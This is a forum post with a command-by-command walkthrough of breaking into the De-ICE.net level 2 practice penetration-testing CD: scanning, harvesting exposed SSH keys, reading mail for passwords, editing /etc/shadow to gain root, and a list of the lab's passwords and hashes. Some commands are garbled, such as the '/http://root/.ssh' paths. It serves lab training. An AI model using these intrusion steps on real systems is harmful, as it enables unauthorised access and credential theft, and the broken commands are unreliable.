Results 1 to 1 of 1

Thread: [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

Threaded View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Attacking - De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3194808
    Download video: http://www.mediafire.com/?fy5867do96xmzao

    What is this?
    This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.
    The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.


    What do I need?

    > BackTrack 4 (Final)
    > de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
    > Dictionary(s)


    Software
    Name: De-ICE.net
    Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)
    Home Page: http://www.de-ice.net or http://heorot.net/livecds/
    Download Link:





    Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=18&t=16
    WiKi/Support: http://de-ice.net/hackerpedia/index...._PenTest_Disks


    Commands:
    Code:
    nmap -n 192.168.2.1-255
    
    nmap -n -sV -sS -O 192.168.2.100
    
    nmap -n -sV -sS -O 192.168.2.101
    
    firefox 192.168.2.100
    
    [+]kate -> list of possible usernames. Save. Filename: usernames.txt
    
    firefox 192.168.2.101
    
    [+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin)  with '~' infront. -> http://192.168.2.101 -> 80
    
    
    
    firefox http://192.168.2.101/~pirrip
    
    [+]kate -> Update usernames with the ones which we got a respond from. Save.
    
    [+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2
    
    ./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
    
    firefox http://192.168.2.101/~pirrip/.ssh
    
    // Save both files
    
    mv /root/id_rsa /http://root/.ssh/id_rsa
    
    mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub
    
    chmod 000 /http://root/.ssh/id_rsa
    
    chmod 000 /http://root/.ssh/id_rsa.pub
    
    ssh pirrip@192.168.2.100
    // Yes
    
    mailx
    // 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'
    
    cd /etc/
    
    vi passwd
    
    // kate -> Update usernames with only valid ones.
    
    vi group
    
    sudo vi shadow
    // edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
    
    su
    // Password: 0l1v3rTw1st
    
    cd /root/
    
    ls -a
    
    cd .save/
    
    ls -a
    
    chmod -R 777 /root/
    
    //In BackTrack//
    
    scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
    
    unzip great_expectations.zip
    
    tar xf great_expectations.tar
    
    strings Jan08
    
    //In SSH//
    sudo iv /var/mail/havisham
    
    modprobe capability
    
    //In BackTrack//
    ftp 192.168.2.100
    // Usrename: pirri. Password: 0l1v3rTw1st //
    
    ls -a
    
    //In SSH//
    
    exit
    
    
    //In BackTrack//
    
    [+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
    // GAME OVER
    
    
    
    ----------------------------------------------------------------------------------------------------
    Users
    root:P1ckw1ckP@p3rs     root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
    havisham:changeme       havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
    pirrip:0l1v3rTw1st      pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
    magwitch:               magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
    ----------------------------------------------------------------------------------------------------
    Notes:
    Song: Ashley Wallbridge - Masquerade (Original Mix)
    Video length: 09:07
    Capture length: 30:35

    Blog Post: http://g0tmi1k.blogspot.com/2010/02/...-2-disk-1.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1663-%5Bvideo%5D-de-ice-net-v2-0-1-100-%7Blevel-2-disk-1%7D.html#post5679 OR http://heorot.net/forums/viewtopic.php?f=18&t=368
    Dictionaries: http://g0tmi1k.blogspot.com/2010/02/...tionaries.html
    Last edited by g0tmi1k; 03-05-2011 at 05:23 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  2. [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  3. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  4. mount hard disk
    By avatar in forum Beginners Forum
    Replies: 1
    Last Post: 02-01-2010, 10:31 AM
  5. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •